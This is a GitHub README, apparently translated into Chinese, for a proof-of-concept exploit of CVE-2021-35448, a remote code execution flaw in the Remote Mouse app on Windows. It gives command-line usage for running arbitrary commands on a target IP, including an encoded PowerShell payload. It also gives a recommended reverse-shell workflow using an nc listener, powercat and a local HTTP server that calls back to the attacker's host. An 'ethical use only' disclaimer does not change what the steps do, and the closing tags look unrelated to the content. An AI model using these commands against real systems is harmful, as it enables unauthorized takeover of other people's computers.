Goultarde/RemoteMouse-3.008-RCE
GitHub: Goultarde/RemoteMouse-3.008-RCE
针对 Remote Mouse 应用 CVE-2021-35448 远程代码执行漏洞的 Python 概念验证与利用脚本。
Stars: 0 | Forks: 0
# CVE-2021-35448 - Remote Mouse 漏洞利用
## 描述
此漏洞利用针对 Remote Mouse 应用程序(原 WiFi Mouse)中的 **CVE-2021-35448** 漏洞。
# POC
[CVE-2021-35448.webm](https://github.com/user-attachments/assets/2aa1ff4a-31c0-46e2-9abb-8bfb17bede61)
## 使用方法
### 基本语法
```
python3 CVE-2021-35448.py -t [OPTIONS]
```
### 选项
- `-t, --target`:目标 IP 地址(必填)
- `-p, --payload`:要执行的自定义命令
- `-r, --reverse`:格式为 IP:PORT 的反弹 shell
- `-l, --http`:格式为 IP:PORT 的本地 HTTP 服务器(与 -r 一起使用时必填)
### 使用示例
#### 1. 自定义命令
```
python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
```
#### 2. 反弹 Shell(推荐)
```
# Terminal 1 - 监听器
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
```
## 前置条件
### 所需文件
- `CVE-2021-35448.py`:主漏洞利用脚本
- `powercat.ps1`:用于反弹 shell 的 PowerShell 脚本
### 目标系统
- 已安装并正在运行 Remote Mouse
- Windows 系统(已在 Windows 10 上测试)
## 警告
⚠️ **仅供道德使用** ⚠️
此工具仅供教育目的和授权的渗透测试使用。未经授权使用此漏洞利用是非法的,并可能导致法律起诉。
## 参考
- [WiFi Mouse 1.7.8.5 - 远程代码执行](https://www.exploit-db.com/exploits/49601)
- [CVE-2021-35448 详情](https://nvd.nist.gov/vuln/detail/CVE-2021-35448)
## 作者
为教育和道德渗透测试目的而开发。
*最后更新:2025*
标签:AI合规, Libemu, OpenCanary, Python, 威胁模拟, 安全, 无后门, 编程工具, 超时处理, 远程代码执行, 逆向工具